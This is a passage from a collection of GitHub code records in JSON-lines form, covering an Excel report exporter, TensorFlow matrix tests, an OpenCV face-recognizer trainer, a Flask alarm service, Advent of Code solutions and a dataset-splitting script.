[\n (df['size_mb'] <= 1), # Very Small [<1 MB]\n (df['size_mb'] <= 10), # Small [1-10 MB]\n (df['size_mb'] <= 100), # Medium [10-100 MB]\n (df['size_mb'] <= 1000), # Large [100-1000 MB]\n (df['size_mb'] > 1000), # Very Large [> 1000 MB]\n ]\n\n choices = ['Very Small [<1 MB]',\n 'Small [1-10 MB]',\n 'Medium [10-100 MB]',\n 'Large [100-1000 MB]',\n 'Very Large [> 1000 MB]']\n\n df['size_classification'] = np.select(conditions, choices)\n\n\ndef add_file_aging_classification():\n conditions = [\n (df['age'] <= 1), # <=1 Year\n (df['age'] <= 
3), # 1-3 Years\n (df['age'] <= 5), # 3-5 Years\n (df['age'] <= 7), # 5-7 Years\n (df['age'] <= 10), # 7-10 Years\n (df['age'] <= 15), # 10-15 Years\n (df['age'] <= 20), # 15-20 Years\n (df['age'] <= 30), # 20-30 Years\n (df['age'] > 30), # 30+ Years\n\n ]\n\n choices = ['<=1 Year',\n '1-3 Years',\n '3-5 Years',\n '5-7 Years',\n '7-10 Years',\n '10-15 Years',\n '15-20 Years',\n '20-30 Years',\n '30+ Years']\n\n df['aging_tier'] = np.select(conditions, choices)\n # print(tabulate(output, headers='keys', tablefmt='psql'))\n\n\ndef add_pivot_by_file_aging_and_type():\n pivot = pd.pivot_table(data=df,\n index=['file_extension', 'file_mime_type', ],\n columns=['aging_tier'],\n aggfunc=['count'],\n values=['file'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'File Aging Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_folder_aging_and_type():\n pivot = pd.pivot_table(data=df,\n index=['folder'],\n columns=['aging_tier'],\n aggfunc=['count'],\n values=['full_path'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'Folder Aging Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_file_size():\n pivot = pd.pivot_table(data=df,\n index=['file_extension', 'file_mime_type', ],\n columns=['size_classification'],\n aggfunc=['count'],\n values=['file'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'File Size Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_pivot_by_folder_size():\n pivot = pd.pivot_table(data=df,\n index=['folder'],\n columns=['size_classification'],\n aggfunc=['count'],\n values=['full_path'],\n fill_value=0,\n margins=True)\n\n workbook_objects.append({'SheetName': 'Folder Size Summary',\n 'Object': pivot,\n 'StartRow': 4,\n 'StartCol': 1\n })\n\n\ndef add_search_results():\n workbook_objects.append({'SheetName': 'Search Results',\n 'Object': df,\n 'StartRow': 0,\n 'StartCol': 0\n })\n\n\ndef add_about_page():\n search_criteria = {\n 'Search Criteria': search.to_dict()\n }\n\n workbook_objects.append({'SheetName': 'About',\n 'Object': pd.DataFrame(search_criteria),\n 'StartRow': 6,\n 'StartCol': 1\n })\n\n\ndef update_about_page():\n # TODO: this needs some improvement; not sure openpyxl is the way to go here\n workbook = openpyxl.load_workbook(report_file)\n worksheet = workbook['About']\n worksheet['B2'] = 'Search Results'\n worksheet['B3'] = 'Purpose:'\n worksheet['C3'] = 'Show all results of a file system search based on customized search criteria'\n worksheet['B4'] = 'Run Date'\n worksheet['C4'] = datetime.today()\n worksheet['B5'] = 'Total Results Found:'\n worksheet['C5'] = str(df.shape[0]) # row count\n\n c = worksheet['B2']\n c.font = Font(size=22, bold=True)\n workbook.save(report_file)\n\n\ndef export_to_excel(report_name):\n # utc is not supported in Excel so need to remove from dataframe during this step\n df['created_dt'] = df['created_dt'].dt.tz_localize(None)\n df['modified_dt'] = df['modified_dt'].dt.tz_localize(None)\n df['opened_dt'] = df['opened_dt'].dt.tz_localize(None)\n\n workbook_objects.append({'SheetName': 'Search Results',\n 'Object': df,\n 'StartRow': 0,\n 'StartCol': 0\n })\n\n with pd.ExcelWriter(report_name) as writer:\n for obj in workbook_objects:\n obj['Object'].to_excel(writer, sheet_name=obj['SheetName'],\n startrow=obj['StartRow'],\n startcol=obj['StartCol'])\n\n sheet = writer.sheets['About']\n sheet.set_column('B:C', 40)\n\n\nif __name__ == '__main__':\n 
get_search_results()\n transform_results()\n generate_report_data()\n\n\n\n\n\n","repo_name":"kking423/file_system_utilities","sub_path":"examples/search_to_xlsx.py","file_name":"search_to_xlsx.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6487208443","text":"import random\nfrom typing import Optional\n\nimport matplotlib\nimport numpy as np\nimport tensorflow as tf\nimport sys\nfrom time import *\nimport os\n\nfrom matplotlib import pyplot as plt\n\nPROJECT_ROOT = os.path.abspath(os.getcwd() + os.sep + os.pardir + os.sep + os.pardir)\nsys.path.insert(0, PROJECT_ROOT)\n\nfrom IRESNs_tensorflow.initializers import *\n\nPATIENCE = 5\nEPOCHS = 200\nOUTPUT_UNITS = 20\nOUTPUT_ACTIVATION = 'softmax'\nLOSS_FUNCTION = 'sparse_categorical_crossentropy'\n\nPROJECT_NAME = \"character trajectories\"\nDATA_DIR = os.path.join(\"datasets\", PROJECT_NAME)\nDATA_DIR = os.path.join(PROJECT_ROOT, DATA_DIR)\n\n\ndef test_spectral_radius():\n x = []\n y = []\n for _ in range(0, 100):\n sr_real = random.uniform(1, 5)\n size = int(random.uniform(100, 500))\n tensor = generate_matrix((size, size), sr_real, 1)\n sr = get_spectral_radius(tensor)\n x.append(size)\n y.append(sr.numpy() - sr_real)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage error:\", sum(y) / len(y))\n print(\"Generate plot:\")\n matplotlib.pyplot.scatter(x, y)\n matplotlib.pyplot.show()\n\n\ndef test_compositions_of_matrix():\n x = []\n y = []\n for _ in range(0, 1):\n sr_real = random.uniform(0, 1)\n size = int(random.uniform(100, 500))\n tensor = generate_matrix((size, size), sr_real, connectivity=0.5)\n sr = get_spectral_radius(tensor)\n x.append(size)\n y.append(sr.numpy() - sr_real)\n # print(sr, sr_real)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage error:\", sum(y) / len(y))\n\n\ndef test_connectivity():\n x = []\n y = []\n for _ in range(0, 1000):\n sr_real = random.uniform(0, 1)\n size = int(random.uniform(100, 500))\n tensor = unipi_generate_matrix((size, size), sr_real)\n zeros = (size * size) - tf.math.count_nonzero(tensor, dtype=float).numpy()\n x.append(size)\n y.append(zeros)\n\n print(\"###########\")\n print(\"average size:\", sum(x) / len(x), \"\\nAverage zeros:\", sum(y) / len(y))\n\n\ndef test_splits():\n partitions = [random.uniform(0., 1.) 
for i in range(3)]\n total = sum(partitions)\n t = list(map(lambda _x: _x / total, partitions))\n print(partitions, total)\n print(t, sum(t))\n\n\ndef test_join_matrices():\n mat1 = np.matrix('1 2; 3 4')\n mat2 = np.matrix('5 6; 7 8')\n mat3 = np.matrix('9 10; 11 12')\n print(join_matrices([[mat1, mat2], [mat3, mat1]]))\n\n\ndef unipi_call(inputs, state, kernel, recurrent_kernel):\n input_part = tf.matmul(inputs, kernel)\n state_part = tf.matmul(state, recurrent_kernel)\n output = input_part + state_part\n return output\n\n\ndef tf_call(inputs, state, kernel, recurrent_kernel):\n in_matrix = tf.concat([inputs, state], axis=1) # Concat horizontally MAT.Shape [ input.y x input.x+states.x]\n weights_matrix = tf.concat([kernel, recurrent_kernel], axis=0) # Concat vertically MAT\n output = tf.linalg.matmul(in_matrix, weights_matrix)\n return output\n\n\ndef test_calls():\n dtype = tf.float64\n min_shape = 100\n max_shape = 500\n\n x = tf.random.uniform((), minval=min_shape, maxval=max_shape, dtype=tf.int32)\n y = tf.random.uniform((), minval=min_shape, maxval=max_shape, dtype=tf.int32)\n\n minmax = 3\n inputs = tf.random.uniform((x, y), minval=-minmax, maxval=minmax, dtype=dtype)\n kernel = tf.random.uniform((y, x), minval=-minmax, maxval=minmax, dtype=dtype)\n state = tf.random.uniform((x, x), minval=-minmax, maxval=minmax, dtype=dtype)\n recurrent_kernel = tf.random.uniform((x, x), minval=-minmax, maxval=minmax, dtype=dtype)\n\n w_tf = tf_call(inputs, state, kernel, recurrent_kernel)\n w_unipi = unipi_call(inputs, state, kernel, recurrent_kernel)\n\n if w_tf.shape != w_unipi.shape:\n print(\"Le shape sono diverse\")\n\n diff = (w_tf - w_unipi)\n max = 0.\n for i in diff:\n for j in i:\n val = abs(j)\n if (val > max):\n max = val\n\n n_zeri = tf.math.count_nonzero(diff).numpy()\n\n print(\"Valore piu grande:\", max.numpy())\n print(\"Valori a zero:\", n_zeri, \" Quindi il \", (n_zeri / (diff.shape[0] * diff.shape[1])) * 100, \"%\")\n\n if diff != tf.zeros((x, y), dtype=dtype):\n print(\"Le matrici sono differenti. unipi_call != tf_call\")\n else:\n print(\"Le matrici sono uguali. 
unipi_call == tf_call\")\n\n\ndef benchmark_calls():\n min_v = 900\n max_v = 1000\n time_tf = []\n time_uni = []\n total_time = time()\n for i in range(10000):\n x = tf.random.uniform((), minval=min_v, maxval=max_v, dtype=tf.int32)\n y = tf.random.uniform((), minval=min_v, maxval=max_v, dtype=tf.int32)\n inputs = tf.random.uniform((x, y), minval=-1, maxval=1, dtype=tf.float32)\n kernel = tf.random.uniform((y, x), minval=-1, maxval=1, dtype=tf.float32)\n state = tf.random.uniform((x, x), minval=-1, maxval=1, dtype=tf.float32)\n recurrent_kernel = tf.random.uniform((x, x), minval=-1, maxval=1, dtype=tf.float32)\n\n start = time()\n _ = unipi_call(inputs, state, kernel, recurrent_kernel)\n time_uni.append(time() - start)\n\n start = time()\n _ = tf_call(inputs, state, kernel, recurrent_kernel)\n time_tf.append(time() - start)\n\n print(\"Totat run time:\", time() - total_time)\n print(\"TF time: \", np.mean(time_tf), \"±\", np.std(time_tf))\n print(\"UNI time: \", np.mean(time_uni), \"±\", np.std(time_uni))\n if np.mean(time_tf) < np.mean(time_uni):\n print(\"Vince TF_call\")\n else:\n print(\"Vince UNIPI_call\")\n\n\ndef benchmark_bias():\n time_if = []\n time_plus = []\n w2 = None\n zero_init = tf.keras.initializers.Zeros()\n for _ in range(30):\n x = tf.random.uniform((), minval=10, maxval=100, dtype=tf.int32)\n y = tf.random.uniform((), minval=10, maxval=100, dtype=tf.int32)\n inputs = tf.random.uniform((x, y), minval=-1, maxval=1)\n bias = tf.random.uniform((x, y), minval=-1, maxval=1)\n start = time()\n if not isinstance(bias, zero_init):\n w2 = inputs + bias\n time_if.append(time() - start)\n start = time()\n w3 = inputs + bias\n time_plus.append(time() - start)\n print(w2)\n print(w3)\n print(\"With if :\", np.mean(time_if), \"+_\", np.std(time_if))\n print(\"Without if:\", np.mean(time_plus), \"+_\", np.std(time_plus))\n\n\ndef benchmark_inits():\n time_uniform = []\n time_glorot = []\n\n x = 1000\n uniform_init = Kernel(initializer=tf.keras.initializers.RandomUniform(minval=-1, maxval=1))\n glorot_init = Kernel()\n for _ in range(1000):\n start = time()\n w = uniform_init(shape=(x, x), dtype=tf.float32)\n time_uniform.append(time() - start)\n\n start = time()\n e = glorot_init(shape=(x, x), dtype=tf.float32)\n time_glorot.append(time() - start)\n print(\"Uniform initializer : {:.5f} ± {:.4f}s\".format(np.mean(time_uniform), np.std(time_uniform)))\n print(\"GlorotUniform initializer: {:.5f} ± {:.4f}s\".format(np.mean(time_glorot), np.std(time_glorot)))\n\n\ndef normalize(mat, sr):\n scaling = tf.math.divide_no_nan(sr, get_spectral_radius(mat))\n return tf.multiply(mat, scaling)\n\n\ndef plot_matrix(title, matrix):\n fig, ax = plt.subplots(figsize=(5, 5))\n im = ax.imshow(matrix)\n ax.set_title(title)\n # Loop over data dimensions and create text annotations.\n for i in range(matrix.shape[0]):\n for j in range(matrix.shape[1]):\n val = tf.cast(matrix[i, j], tf.float32)\n text = ax.text(j, i, \"{:.5f}\".format(val),\n ha=\"center\", va=\"center\", color=\"w\")\n fig.tight_layout()\n plt.show()\n\n\ndef test_generation_matrix():\n size_x = 10\n size_y = 10\n srx = 6.\n sry = 4.\n gsr = 2.\n\n init = tf.keras.initializers.GlorotUniform()\n\n x_mat = init((size_x, size_x))\n y_mat = init((size_y, size_y))\n xy_zero = tf.keras.initializers.Zeros()((size_x, size_y))\n\n x_norm = normalize(x_mat, srx)\n y_norm = normalize(y_mat, sry)\n xy_norm = join_matrices([[x_norm, xy_zero], [tf.transpose(xy_zero), y_norm]])\n xy_norm2 = normalize(xy_norm, gsr)\n\n xy_mat = join_matrices([[x_mat, 
xy_zero], [tf.transpose(xy_zero), y_mat]])\n mat_norm = normalize(xy_mat, gsr)\n\n diff = xy_norm2 - mat_norm\n\n print(\"SR xy_norm\", get_spectral_radius(xy_norm).numpy())\n print(\"SR xy_norm2\", get_spectral_radius(xy_norm2).numpy())\n print(\"\")\n print(\"SR xy_mat\", get_spectral_radius(xy_mat).numpy())\n print(\"SR mat_norm\", get_spectral_radius(mat_norm).numpy())\n print(\"\")\n print(\"SR diff\", get_spectral_radius(diff).numpy())\n\n print(\"Are equals: \", (tf.math.count_nonzero(diff) == 0).numpy())\n\n plot_matrix(\"xy_norm\", xy_norm)\n plot_matrix(\"xy_norm2\", xy_norm2)\n\n plot_matrix(\"mat_norm\", mat_norm)\n\n plot_matrix(\"DIFF\", xy_norm2 - mat_norm)\n\n\nif __name__ == '__main__':\n tf.random.set_seed(42)\n # benchmark_calls()\n reservoirs = 3\n test = [[(i, j)\n for i in range(reservoirs)]\n for j in range(reservoirs)]\n for i in test:\n for j in i:\n print(j, end=\" \")\n print()\n\n print(test)","repo_name":"SilverLuke/Tesi","sub_path":"notebooks/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":9173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29931077546","text":"for test in range(int(input())):\n arr = []\n n = int(input())\n for i in range(0,n+1):\n arr.append(list())\n for j in range(0, i):\n if j == 0:\n arr[i].append(1)\n elif j == i-1:\n arr[i].append(1)\n else:\n arr[i].append(arr[i-1][j-1]+arr[i-1][j])\n print('#' + str(test + 1))\n\n for k in range(1,n+1):\n for m in range(k):\n print(arr[k][m], end = ' ')\n print()","repo_name":"huu-k/Algorithm","sub_path":"SWEA/D2/2005. 파스칼의 삼각형/파스칼의 삼각형.py","file_name":"파스칼의 삼각형.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30917926","text":"import cv2\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image \r\n\r\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\r\n'''\r\nface.createLBPHFaceRecognizer yuz tanimada kullanilan opencv \r\nkutuphanesinde yer alan bir algoritmadir. Her bir kullanicidan \r\nalinan 50 adet goruntu face.createLBPHFaceRecognizer algoritmasinda\r\nozellik cikarimi (yuze ait noktalar) tanimlanmistir\r\n'''\r\n\r\ncascadePath = \"Classifiers/face.xml\" \r\n\r\nfaceCascade = cv2.CascadeClassifier(cascadePath);\r\n\r\npath = 'dataSet' # alinacak goruntulerin konumu (dataset klasoru)\r\n\r\ndef get_images_and_labels(path):\r\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\r\n\r\n\r\n#image_paths degiskeniene dataset klasorundeki tum dosyaların konumu\r\n#adi ve uzantisi bilgileri alinmaktadir. \r\n#\r\n\r\n #resimlerin dizi verileri için\r\n images = [] \r\n #resimlerin ID değeri\r\n labels = [] \r\n for image_path in image_paths: \r\n \r\n # alinan goruntulerin sayisi kadar donmesi icin\r\n \r\n # resim oku ve grayscale'ye dönüştür\r\n image_pil = Image.open(image_path).convert('L')\r\n \r\n \r\n # resim oku ve numpy dizi dönüştür \r\n image = np.array(image_pil, 'uint8')\r\n \r\n # resimden ID değeri okumak\r\n nbr = int(os.path.split(image_path)[1].split(\".\")[0].replace(\"face-\", \"\"))\r\n#\r\n# Face-Id(kişi no).(resim no).jpg dosyasindan \r\n# sadece resim kişi noyu almak icin kullanilir. Ornegin \r\n# face-0.1.jpg dosyasinda 0 kişinin id'si 1 ise kişinin \r\n# ikinci resmi oldugunu gostermektedir.\r\n# replace(\"face-\", \"\") ile face- silinmektedir. Geriye\r\n# 0.1.jpg kalmaktadir. 
\r\n# image_path)[1] ile 0.1 ifadesi kalir.\r\n# split(\".\")[0] ile noktaya gore ayir ve 0 deger olan\r\n# 0 degerini alir. \r\n#\r\n print (nbr)\r\n \r\n # resim içindeki yüz algılamak için o da eğer resim içinde sadece yüz değil\r\n faces = faceCascade.detectMultiScale(image)\r\n \r\n # resimlerden elde edilen veriler images diziye aktar ve resimlerin ID sı labels diziye aktar\r\n for (x, y, w, h) in faces:\r\n \r\n\r\n# Goruntuler ve ID degerleri ayri ayri eklenmektedir\r\n\r\n images.append(image[y: y + h, x: x + w])\r\n labels.append(nbr)\r\n \r\n cv2.imshow(\"Egitim setine yuzler eklenmektedir...\", image[y: y + h, x: x + w])\r\n cv2.waitKey(10)\r\n # images labels listesi dondurulmektedir.\r\n return images, labels\r\n\r\n\r\nimages, labels = get_images_and_labels(path)\r\n'''\r\ntest icin alinan goruntuler gosterilmektedir.\r\n'''\r\ncv2.imshow('test',images[0])\r\ncv2.waitKey(1)\r\n\r\nrecognizer.train(images, np.array(labels))\r\n'''\r\nverilen resimlerin verileri ve resim Id ları ile Yüz Tanıma \r\nalgoritmasina gore egirilmektedir\r\n'''\r\nrecognizer.save('trainer/trainer.yml') \r\n# egitim dosyalari kaydedilmektedir.\r\n# model dosyalarinin genellikle uzantisi yml olmaktadir.\r\ncv2.destroyAllWindows()\r\n","repo_name":"ZAKARIA995/Computer-Vision-Face-Detection-ML-Training-","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29674330496","text":"\"\"\"\nTo run application:\n\n1.-\n >cd entrypoints/\n >export FLASK_APP=app.py\n >flask run\n\n2.-\n >FLASK_APP=app.py flask run\n\nTo test application:\n\n >curl http://localhost:5000/\n\"\"\"\n\nimport uuid\nimport logging\n\nfrom flask import Flask, jsonify, request, current_app\nfrom services import app_service \nfrom exceptions.services_exception import ServiceException\n\n\napp = Flask(__name__)\n\nlogging.basicConfig(level=logging.DEBUG)\n\n\n@app.route(\"/\", methods=['GET'])\ndef root():\n \"\"\"\n Root entrypoint\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /root\")\n return jsonify({'result': 'Ok'}), 200\n\n\n@app.route(\"/liveness\", methods=['GET'])\ndef liveness():\n \"\"\"\n Liveness entrypoint.\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /liveness\")\n return 'Ok', 200\n\n\n@app.route(\"/readiness\", methods=['GET'])\ndef rediness():\n \"\"\"\n Rediness entrypoint.\n :return: str\n \"\"\"\n current_app.logger.info(f\"[*] /rediness\")\n return 'Ok', 200\n\n\n@app.route(\"/alarm1\", methods=['GET'])\ndef doAlarm1():\n \"\"\"\n Alarm1 entrypoint\n :return: str, código error. 
(510- Error de servicio de negocio)\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n current_app.logger.info(f\"[*] /alarm1\")\n app_service.setAlarm1()\n response_result = {'result': 'Ok'}\n code_result = 200\n \n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\n\n@app.route(\"/alarm2\", methods=['GET'])\ndef doAlarm2():\n \"\"\"\n Alarm1 entrypoint\n :return: str\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n\n current_app.logger.info(f\"[*] /alarm2\")\n app_service.setAlarm2()\n response_result = {'result': 'Ok'}\n code_result = 200\n\n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\n\n@app.route(\"/alarm3\", methods=['GET'])\ndef doAlarm3():\n \"\"\"\n Alarm3 entrypoint\n :return: str\n \"\"\"\n\n response_result = None\n code_result = 0\n try:\n\n current_app.logger.info(f\"[*] /alarm3\")\n app_service.setAlarm3()\n response_result = {'result': 'Ok'}\n code_result = 200\n\n except ServiceException as service_exception:\n response_result = {'result': 'Ko', 'error': str(service_exception)}\n code_result = 510 \n\n return jsonify(response_result), code_result\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AlvaroMonsalveSerrano/Bridge-TFM","sub_path":"app/entrypoints/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31316508239","text":"import itertools\nfrom collections import defaultdict\n\nclass Intcode():\n def __init__(self, memory):\n self.memory = memory\n self.cursor = 0\n self._input = []\n self._output = []\n self.instructions = {\n 1: self.sum_instruction,\n 2: self.multiplication_instruction,\n 3: self.input_instruction,\n 4: self.output_instruction,\n 99: self.exit_instruction\n }\n super().__init__()\n\n def run(self, input=None):\n if input is not None:\n self._input = input\n res = self.tick()\n while not res:\n res = self.tick()\n return res\n\n def output(self, val):\n self._output.append(val)\n\n def get_output(self):\n return self._output\n\n def pop_input(self):\n return self._input.pop()\n\n def set_memory(self, pos, val):\n self.memory[pos] = val\n\n def get(self, position):\n return self.memory[position]\n\n def pop(self):\n val = self.memory[self.cursor]\n self.cursor += 1\n return val\n\n def pop_instruction(self):\n instruction = self.pop()\n encoded_modes, op = divmod(instruction, 100)\n modes = {i: int(x) for i, x in enumerate(reversed(str(encoded_modes)))}\n return op, modes\n\n def tick(self):\n instruction, modes = self.pop_instruction()\n handler = self.instructions.get(instruction)\n if handler is not None:\n return handler(modes)\n else:\n raise Exception(\"Unknown instruction: {}\".format(instruction))\n\n def sum_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, left + right)\n return False\n\n def multiplication_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n 
self.set_memory(output_position, left * right)\n return False\n\n def input_instruction(self, modes):\n output_position = self.output_position(self.pop(), modes.pop(0, 0))\n val = self.pop_input()\n self.set_memory(output_position, val)\n return False\n\n def output_position(self, arg, mode):\n if mode == 0:\n return arg\n raise AssertionError(\"Immediate mode for output?\")\n\n def output_instruction(self, modes):\n val = self.get_arg(self.pop(), modes.pop(0, 0))\n self.output(val)\n return False\n\n def exit_instruction(self, modes):\n return True\n\n def get_arg(self, arg, mode):\n if mode == 0:\n return self.get(arg)\n if mode == 1:\n return arg\n else:\n raise Exception(\"Expected a mode to be 0 or 1. Found={}\".format(mode))\n\nclass Jumper(Intcode):\n def __init__(self, memory):\n super().__init__(memory)\n self.instructions.update(\n {\n 5: self.jump_if_true_instruction,\n 6: self.jump_if_false_instruction,\n 7: self.less_then_instruction,\n 8: self.equals_instruction,\n }\n )\n\n def set_cursor(self, pointer):\n self.cursor = pointer\n\n def jump_if_true_instruction(self, modes):\n condition = self.get_arg(self.pop(), modes.pop(0, 0))\n pointer = self.get_arg(self.pop(), modes.pop(1, 0))\n if condition != 0:\n self.set_cursor(pointer)\n\n def jump_if_false_instruction(self, modes):\n condition = self.get_arg(self.pop(), modes.pop(0, 0))\n pointer = self.get_arg(self.pop(), modes.pop(1, 0))\n if condition == 0:\n self.set_cursor(pointer)\n\n def less_then_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, int(left < right))\n return False\n\n def equals_instruction(self, modes):\n left = self.get_arg(self.pop(), modes.pop(0, 0))\n right = self.get_arg(self.pop(), modes.pop(1, 0))\n output_position = self.output_position(self.pop(), modes.pop(2, 0))\n self.set_memory(output_position, int(left == right))\n return False\n\nclass IntcodeV3(Jumper):\n def __init__(self, memory):\n super().__init__(memory)\n self.memory = defaultdict(\n lambda : 0,\n {i: v for i, v in enumerate(self.memory)}\n )\n self.relative_base = 0\n self.instructions.update({\n 9: self.adjust_base_instruction\n })\n\n def adjust_base_instruction(self, modes):\n self.relative_base += self.get_arg(self.pop(), modes.pop(0, 0))\n return False\n\n def get_arg(self, arg, mode):\n if mode == 2:\n return self.get(self.relative_base + arg)\n return super().get_arg(arg, mode)\n\n def output_position(self, arg, mode):\n if mode == 2:\n return self.relative_base + arg\n return super().output_position(arg, mode)\n\ndef part1(program):\n computer = IntcodeV3(program)\n computer.run([1])\n return computer.get_output()\n\n\ndef part2(program):\n computer = IntcodeV3(program)\n computer.run([2])\n return computer.get_output()\n\nif __name__ == \"__main__\":\n with open('input') as f:\n memory = [int(x) for x in f.read().strip().split(',')]\n print(part1(memory[:]))\n print(part2(memory[:]))","repo_name":"makarchuk/advent-of-code-2019","sub_path":"day9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2205734433","text":"# -*- coding: utf-8 -*-\n# Autor: christian\nfrom django.conf.urls import patterns, url\n\nfrom . 
import views\n\nurlpatterns = patterns(\n 'apps.formulario_auto_correcao.views',\n url(r'^ajax_responder/$', views.ajax_responder, name='responder'),\n url(r'^baixar_correcao/(?P[0-9]+)/$', views.baixar_correcao, name='baixar_correcao'),\n)\n","repo_name":"desenvolvimento-justutor/v1","sub_path":"apps/formulario_auto_correcao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35344411953","text":"import multiprocessing\n\n\ndef worker():\n LIST.append('item')\n\n\nLIST = []\n\n\nif __name__ == \"__main__\":\n processes = [\n multiprocessing.Process(target=worker)\n for _ in range(5)\n ]\n for p in processes:\n p.start()\n for p in processes:\n p.join()\n print(LIST)\n\n \"\"\"В Python процессы выполняются независимо и имеют собственное пространство памяти.\n все процессы могут использовать глобальные данные, но у них будет разная память для обработки, поэтому они не влияют друг на друга.\"\"\"","repo_name":"phienhoang/phienhoang_python","sub_path":"w11/N5.py","file_name":"N5.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30283650458","text":"# Advent of Code: Day 2\n\n## Part 1\ndef part1(L):\n H = 0\n D = 0\n for line in L:\n direction, q = line.split()\n q = int(q)\n if direction == \"forward\":\n H += q\n\n elif direction == \"down\":\n D += q\n\n elif direction == \"up\":\n D -= q\n\n return H * D\n\n## Part 2\ndef part2(L):\n H = 0\n D = 0\n A = 0\n for line in L:\n direction, q = line.split()\n q = int(q)\n\n if direction == \"forward\":\n H += q\n D += A * q\n\n elif direction == \"down\":\n A += q\n\n elif direction == \"up\":\n A -= q\n\n return H * D\n\nwith open(\"2021/input/2.txt\") as F:\n L = F.readlines()\n\n print(\"Begin Part 1:\")\n print(\"assert part1(L) == 1727835\")\n assert part1(L) == 1727835\n print(\"Part 1 Successful\\n\")\n\n print(\"Begin Part 2:\")\n print(\"assert part2(L) == 1544000595\")\n assert part2(L) == 1544000595\n print(\"Part 2 Successful\\n\")\n","repo_name":"Christofosho/advent-of-code","sub_path":"2021/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10940766921","text":"import argparse\nfrom argparse import Namespace\nfrom pathlib import Path\n\nfrom omegaconf import OmegaConf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndef create_dataset(filepath: Path) -> pd.DataFrame:\n with open(filepath, mode=\"rb\") as io:\n list_of_sentences = io.readlines()\n data = []\n\n for sentence in list_of_sentences:\n try:\n decoded_sentence = sentence.strip().decode(\"utf-8\")\n label = int(decoded_sentence[0])\n document = decoded_sentence[2:]\n data.append({\"document\": document, \"label\": label})\n except UnicodeDecodeError:\n continue\n\n return pd.DataFrame(data)\n\n\ndef main(args: Namespace) -> None:\n parent_config_dir = Path(\"conf\")\n child_config_dir = parent_config_dir / args.dataset\n\n parent_dataset_dir = Path(\"dataset\")\n child_dataset_dir = parent_dataset_dir / args.dataset\n\n pipeline_config_dir = child_config_dir / \"pipeline\"\n pipeline_config_path = pipeline_config_dir / f\"{args.pipeline}.yaml\"\n pipeline_config = OmegaConf.load(pipeline_config_path)\n\n if args.dataset == \"nsmc\":\n # loading dataset\n dataset = 
pd.read_csv(pipeline_config.dataset.path.train, sep=\"\\t\").loc[\n :, [\"document\", \"label\"]\n ]\n dataset = dataset.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n train, validation = train_test_split(\n dataset, test_size=args.valid_ratio, random_state=args.seed\n )\n test = pd.read_csv(pipeline_config.dataset.path.test, sep=\"\\t\").loc[\n :, [\"document\", \"label\"]\n ]\n test = test.loc[test[\"document\"].isna().apply(lambda elm: not elm), :]\n\n elif args.dataset == \"trec6\":\n\n dataset = create_dataset(pipeline_config.dataset.path.train)\n dataset = dataset.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n\n train, validation = train_test_split(\n dataset, test_size=args.valid_ratio, random_state=args.seed\n )\n\n test = create_dataset(pipeline_config.dataset.path.test)\n test = test.loc[dataset[\"document\"].isna().apply(lambda elm: not elm), :]\n\n path_dict = {\n \"train\": str(child_dataset_dir / 